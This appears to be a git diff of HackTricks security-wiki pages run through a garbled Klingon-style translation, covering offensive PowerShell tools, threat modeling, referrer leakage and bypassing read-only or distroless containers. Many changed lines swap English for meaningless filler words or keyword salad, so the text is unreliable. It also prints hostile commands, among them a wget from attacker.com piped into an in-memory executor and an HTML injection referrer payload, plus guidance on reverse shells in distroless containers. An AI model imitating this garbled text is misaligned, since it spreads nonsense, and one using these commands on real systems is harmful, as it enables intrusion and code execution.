[PS>Attack](https://github.com/jaredhaight/PSAttack) PS console vItlhutlh offensive PS modules preloaded (cyphered)\
|
||||
[https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f9](https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f93c)[\
|
||||
WinPWN](https://github.com/SecureThisShit/WinPwn) PS console with some offensive PS modules and proxy detection (IEX)
|
||||
WinPWN](https://github.com/SecureThisShit/WinPwn) PS console vItlhutlh offensive PS modules proxy detection (IEX)
|
||||
|
||||
## References
|
||||
|
||||
|
@ -581,7 +835,7 @@ WinPWN](https://github.com/SecureThisShit/WinPwn) PS console with some offensive
|
|||
|
||||
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today.
|
||||
vItlhutlh vulnerabilities 'oH vItlhutlh 'oH vItlhutlh. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today.
|
||||
|
||||
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
|
||||
|
||||
|
|
|
@ -2,7 +2,7 @@
|
|||
|
||||
## Threat Modeling
|
||||
|
||||
Welcome to HackTricks' comprehensive guide on Threat Modeling! Embark on an exploration of this critical aspect of cybersecurity, where we identify, understand, and strategize against potential vulnerabilities in a system. This thread serves as a step-by-step guide packed with real-world examples, helpful software, and easy-to-understand explanations. Ideal for both novices and experienced practitioners looking to fortify their cybersecurity defenses.
|
||||
QaH jatlh HackTricks' comprehensive guide on Threat Modeling! QapHa' jImej, DaH jImej, 'ej strategize against potential vulnerabilities in a system. vItlhutlh thread serves as a step-by-step guide packed with real-world examples, helpful software, 'ej easy-to-understand explanations. Ideal for both novices 'ej experienced practitioners looking to fortify their cybersecurity defenses.
|
||||
|
||||
### Commonly Used Scenarios
|
||||
|
||||
|
@ -19,30 +19,30 @@ Threat models often feature elements marked in red, symbolizing potential vulner
|
|||
|
||||
The CIA Triad is a widely recognized model in the field of information security, standing for Confidentiality, Integrity, and Availability. These three pillars form the foundation upon which many security measures and policies are built, including threat modeling methodologies.
|
||||
|
||||
1. **Confidentiality**: Ensuring that the data or system is not accessed by unauthorized individuals. This is a central aspect of security, requiring appropriate access controls, encryption, and other measures to prevent data breaches.
|
||||
2. **Integrity**: The accuracy, consistency, and trustworthiness of the data over its lifecycle. This principle ensures that the data is not altered or tampered with by unauthorized parties. It often involves checksums, hashing, and other data verification methods.
|
||||
3. **Availability**: This ensures that data and services are accessible to authorized users when needed. This often involves redundancy, fault tolerance, and high-availability configurations to keep systems running even in the face of disruptions.
|
||||
1. **Confidentiality**: Ensuring that the data or system is not accessed by unauthorized individuals. This is a central aspect of security, requiring appropriate access controls, encryption, 'ej other measures to prevent data breaches.
|
||||
2. **Integrity**: The accuracy, consistency, 'ej trustworthiness of the data over its lifecycle. This principle ensures that the data is not altered or tampered with by unauthorized parties. It often involves checksums, hashing, 'ej other data verification methods.
|
||||
3. **Availability**: This ensures that data 'ej services are accessible to authorized users when needed. This often involves redundancy, fault tolerance, 'ej high-availability configurations to keep systems running even in the face of disruptions.
|
||||
|
||||
### Threat Modeling Methodlogies
|
||||
|
||||
1. **STRIDE**: Developed by Microsoft, STRIDE is an acronym for **Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, and Elevation of Privilege**. Each category represents a type of threat, and this methodology is commonly used in the design phase of a program or system to identify potential threats.
|
||||
2. **DREAD**: This is another methodology from Microsoft used for risk assessment of identified threats. DREAD stands for **Damage potential, Reproducibility, Exploitability, Affected users, and Discoverability**. Each of these factors is scored, and the result is used to prioritize identified threats.
|
||||
3. **PASTA** (Process for Attack Simulation and Threat Analysis): This is a seven-step, **risk-centric** methodology. It includes defining and identifying security objectives, creating a technical scope, application decomposition, threat analysis, vulnerability analysis, and risk/triage assessment.
|
||||
4. **Trike**: This is a risk-based methodology that focuses on defending assets. It starts from a **risk management** perspective and looks at threats and vulnerabilities in that context.
|
||||
5. **VAST** (Visual, Agile, and Simple Threat modeling): This approach aims to be more accessible and integrates into Agile development environments. It combines elements from the other methodologies and focuses on **visual representations of threats**.
|
||||
6. **OCTAVE** (Operationally Critical Threat, Asset, and Vulnerability Evaluation): Developed by the CERT Coordination Center, this framework is geared toward **organizational risk assessment rather than specific systems or software**.
|
||||
1. **STRIDE**: Developed by Microsoft, STRIDE is an acronym for **Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, 'ej Elevation of Privilege**. Each category represents a type of threat, 'ej this methodology is commonly used in the design phase of a program or system to identify potential threats.
|
||||
2. **DREAD**: This is another methodology from Microsoft used for risk assessment of identified threats. DREAD stands for **Damage potential, Reproducibility, Exploitability, Affected users, 'ej Discoverability**. Each of these factors is scored, 'ej the result is used to prioritize identified threats.
|
||||
3. **PASTA** (Process for Attack Simulation 'ej Threat Analysis): This is a seven-step, **risk-centric** methodology. It includes defining 'ej identifying security objectives, creating a technical scope, application decomposition, threat analysis, vulnerability analysis, 'ej risk/triage assessment.
|
||||
4. **Trike**: This is a risk-based methodology that focuses on defending assets. It starts from a **risk management** perspective 'ej looks at threats 'ej vulnerabilities in that context.
|
||||
5. **VAST** (Visual, Agile, 'ej Simple Threat modeling): This approach aims to be more accessible 'ej integrates into Agile development environments. It combines elements from the other methodologies 'ej focuses on **visual representations of threats**.
|
||||
6. **OCTAVE** (Operationally Critical Threat, Asset, 'ej Vulnerability Evaluation): Developed by the CERT Coordination Center, this framework is geared toward **organizational risk assessment rather than specific systems or software**.
|
||||
|
||||
## Tools
|
||||
|
||||
There are several tools and software solutions available that can **assist** with the creation and management of threat models. Here are a few you might consider.
|
||||
There are several tools 'ej software solutions available that can **assist** with the creation 'ej management of threat models. Here are a few you might consider.
|
||||
|
||||
### [SpiderSuite](https://github.com/3nock/SpiderSuite)
|
||||
|
||||
An advance cross-platform and multi-feature GUI web spider/crawler for cyber security professionals. Spider Suite can be used for attack surface mapping and analysis.
|
||||
An advance cross-platform 'ej multi-feature GUI web spider/crawler for cyber security professionals. Spider Suite can be used for attack surface mapping 'ej analysis.
|
||||
|
||||
**Usage**
|
||||
|
||||
1. Pick a URL and Crawl
|
||||
1. Pick a URL 'ej Crawl
|
||||
|
||||
<figure><img src="../.gitbook/assets/threatmodel_spidersuite_1.png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
@ -52,7 +52,7 @@ An advance cross-platform and multi-feature GUI web spider/crawler for cyber sec
|
|||
|
||||
### [OWASP Threat Dragon](https://github.com/OWASP/threat-dragon/releases)
|
||||
|
||||
An open-source project from OWASP, Threat Dragon is both a web and desktop application that includes system diagramming as well as a rule engine to auto-generate threats/mitigations.
|
||||
An open-source project from OWASP, Threat Dragon is both a web 'ej desktop application that includes system diagramming as well as a rule engine to auto-generate threats/mitigations.
|
||||
|
||||
**Usage**
|
||||
|
||||
|
@ -96,16 +96,16 @@ Now you can create the threat
|
|||
|
||||
<figure><img src="../.gitbook/assets/4_threatmodel_create-threat.jpg" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
Keep in mind that there is a difference between Actor Threats and Process Threats. If you would add a threat to an Actor then you will only be able to choose "Spoofing" and "Repudiation. However in our example we add threat to a Process entity so we will see this in the threat creation box:
|
||||
Keep in mind that there is a difference between Actor Threats 'ej Process Threats. If you would add a threat to an Actor then you will only be able to choose "Spoofing" 'ej "Repudiation. However in our example we add threat to a Process entity so we will see this in the threat creation box:
|
||||
|
||||
<figure><img src="../.gitbook/assets/2_threatmodel_type-option.jpg" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
6. Done
|
||||
|
||||
Now your finished model should look something like this. And this is how you make a simple threat model with OWASP Threat Dragon.
|
||||
Now your finished model should look something like this. 'ej this is how you make a simple threat model with OWASP Threat Dragon.
|
||||
|
||||
<figure><img src="../.gitbook/assets/threat_model_finished.jpg" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
### [Microsoft Threat Modeling Tool](https://aka.ms/threatmodelingtool)
|
||||
|
||||
This is a free tool from Microsoft that helps in finding threats in the design phase of software projects. It uses the STRIDE methodology and is particularly suitable for those developing on Microsoft's stack.
|
||||
This is a free tool from Microsoft that helps in finding threats in the design phase of software projects. It uses the STRIDE methodology 'ej is particularly suitable for those developing on Microsoft's stack.
|
||||
|
|
File diff suppressed because one or more lines are too long
|
@ -1,8 +1,6 @@
|
|||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>qaStaHvIS AWS hacking vItlh zero to hero</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
|
||||
|
@ -17,7 +15,7 @@ Other ways to support HackTricks:
|
|||
|
||||
# Referrer headers and policy
|
||||
|
||||
Referrer is the header used by browsers to indicate which was the previous page visited.
|
||||
Referrer vItlh browsers lo'laH previous page visited jImej.
|
||||
|
||||
## Sensitive information leaked
|
||||
|
||||
|
@ -26,7 +24,6 @@ If at some point inside a web page any sensitive information is located on a GET
|
|||
## Mitigation
|
||||
|
||||
You can make the browser follow a **Referrer-policy** that could **avoid** the sensitive information to be sent to other web applications:
|
||||
|
||||
```
|
||||
Referrer-Policy: no-referrer
|
||||
Referrer-Policy: no-referrer-when-downgrade
|
||||
|
@ -37,19 +34,16 @@ Referrer-Policy: strict-origin
|
|||
Referrer-Policy: strict-origin-when-cross-origin
|
||||
Referrer-Policy: unsafe-url
|
||||
```
|
||||
|
||||
## Counter-Mitigation
|
||||
|
||||
You can override this rule using an HTML meta tag (the attacker needs to exploit and HTML injection):
|
||||
|
||||
{HTML meta tag translation} (HTML injection attack vItlhutlh):
|
||||
```markup
|
||||
<meta name="referrer" content="unsafe-url">
|
||||
<img src="https://attacker.com">
|
||||
```
|
||||
## QeH
|
||||
|
||||
## Defense
|
||||
|
||||
Never put any sensitive data inside GET parameters or paths in the URL.
|
||||
jImej GET parameters qojDaq pagh URL Daq vItlhutlh.
|
||||
|
||||
|
||||
<details>
|
||||
|
@ -65,5 +59,3 @@ Other ways to support HackTricks:
|
|||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
@ -28,12 +28,12 @@ It's more and more common to find linux machines mounted with **read-only (ro) f
|
|||
<pre class="language-yaml"><code class="lang-yaml">apiVersion: v1
|
||||
kind: Pod
|
||||
metadata:
|
||||
name: alpine-pod
|
||||
name: alpine-pod
|
||||
spec:
|
||||
containers:
|
||||
- name: alpine
|
||||
image: alpine
|
||||
securityContext:
|
||||
containers:
|
||||
- name: alpine
|
||||
image: alpine
|
||||
securityContext:
|
||||
<strong> readOnlyRootFilesystem: true
|
||||
</strong> command: ["sh", "-c", "while true; do sleep 1000; done"]
|
||||
</code></pre>
|
||||
|
@ -75,57 +75,49 @@ Therefore, **controlling the assembly code** that is being executed by the proce
|
|||
{% hint style="success" %}
|
||||
**DDexec / EverythingExec** will allow you to load and **execute** your own **shellcode** or **any binary** from **memory**.
|
||||
{% endhint %}
|
||||
|
||||
```bash
|
||||
# Basic example
|
||||
wget -O- https://attacker.com/binary.elf | base64 -w0 | bash ddexec.sh argv0 foo bar
|
||||
```
|
||||
|
||||
For more information about this technique check the Github or:
|
||||
|
||||
{% content-ref url="ddexec.md" %}
|
||||
[ddexec.md](ddexec.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
### MemExec
|
||||
|
||||
[**Memexec**](https://github.com/arget13/memexec) is the natural next step of DDexec. It's a **DDexec shellcode demonised**, so every time that you want to **run a different binary** you don't need to relaunch DDexec, you can just run memexec shellcode via the DDexec technique and then **communicate with this deamon to pass new binaries to load and run**.
|
||||
[**Memexec**](https://github.com/arget13/memexec) jImejDaq **DDexec**. **DDexec shellcode demonised** vItlhutlh, **binary vItlhutlh** run **bI'rel** **DDexec** vItlhutlh, **memexec shellcode** run **bI'rel** **communicate**.
|
||||
|
||||
You can find an example on how to use **memexec to execute binaries from a PHP reverse shell** in [https://github.com/arget13/memexec/blob/main/a.php](https://github.com/arget13/memexec/blob/main/a.php).
|
||||
**memexec to execute binaries from a PHP reverse shell** [https://github.com/arget13/memexec/blob/main/a.php](https://github.com/arget13/memexec/blob/main/a.php) **example**.
|
||||
|
||||
### Memdlopen
|
||||
|
||||
With a similar purpose to DDexec, [**memdlopen**](https://github.com/arget13/memdlopen) technique allows an **easier way to load binaries** in memory to later execute them. It could allow even to load binaries with dependencies.
|
||||
**memdlopen** [**memdlopen**](https://github.com/arget13/memdlopen) technique **load binaries** **easier way** **execute**. **load binaries with dependencies** **allow**.
|
||||
|
||||
## Distroless Bypass
|
||||
|
||||
### What is distroless
|
||||
### Distroless vItlhutlh
|
||||
|
||||
Distroless containers contain only the **bare minimum components necessary to run a specific application or service**, such as libraries and runtime dependencies, but exclude larger components like a package manager, shell, or system utilities.
|
||||
Distroless containers **bare minimum components necessary to run a specific application or service** vItlhutlh, **libraries and runtime dependencies** vItlhutlh, **package manager, shell, or system utilities** vItlhutlh.
|
||||
|
||||
The goal of distroless containers is to **reduce the attack surface of containers by eliminating unnecessary components** and minimising the number of vulnerabilities that can be exploited.
|
||||
Distroless containers **reduce the attack surface of containers by eliminating unnecessary components** **minimising the number of vulnerabilities that can be exploited**.
|
||||
|
||||
### Reverse Shell
|
||||
|
||||
In a distroless container you might **not even find `sh` or `bash`** to get a regular shell. You won't also find binaries such as `ls`, `whoami`, `id`... everything that you usually run in a system.
|
||||
Distroless container **`sh` or `bash`** **find**. **ls**, **whoami**, **id**... **binaries** **find**.
|
||||
|
||||
{% hint style="warning" %}
|
||||
Therefore, you **won't** be able to get a **reverse shell** or **enumerate** the system as you usually do.
|
||||
**reverse shell** **enumerate** **system** **able**.
|
||||
{% endhint %}
|
||||
|
||||
However, if the compromised container is running for example a flask web, then python is installed, and therefore you can grab a **Python reverse shell**. If it's running node, you can grab a Node rev shell, and the same with mostly any **scripting language**.
|
||||
**compromised container** **flask web** run, **python** **installed**, **Python reverse shell** **grab**. **node** run, **Node rev shell** **grab**, **scripting language** **grab**.
|
||||
|
||||
{% hint style="success" %}
|
||||
Using the scripting language you could **enumerate the system** using the language capabilities.
|
||||
**scripting language** **enumerate the system** **use**.
|
||||
{% endhint %}
|
||||
|
||||
If there is **no `read-only/no-exec`** protections you could abuse your reverse shell to **write in the file system your binaries** and **execute** them.
|
||||
**`read-only/no-exec`** **protections** **abuse** **reverse shell** **write in the file system your binaries** **execute**.
|
||||
|
||||
{% hint style="success" %}
|
||||
However, in this kind of containers these protections will usually exist, but you could use the **previous memory execution techniques to bypass them**.
|
||||
**kind of containers** **protections** **usually exist**, **previous memory execution techniques to bypass them** **use**.
|
||||
{% endhint %}
|
||||
|
||||
You can find **examples** on how to **exploit some RCE vulnerabilities** to get scripting languages **reverse shells** and execute binaries from memory in [**https://github.com/carlospolop/DistrolessRCE**](https://github.com/carlospolop/DistrolessRCE).
|
||||
**exploit some RCE vulnerabilities** **reverse shells** **execute binaries from memory** **examples** [**https://github.com/carlospolop/DistrolessRCE**](https://github.com/carlospolop/DistrolessRCE).
|
||||
|
||||
<details>
|
||||
|
||||
|
|
Some files were not shown because too many files have changed in this diff Show more
Loading…
Reference in a new issue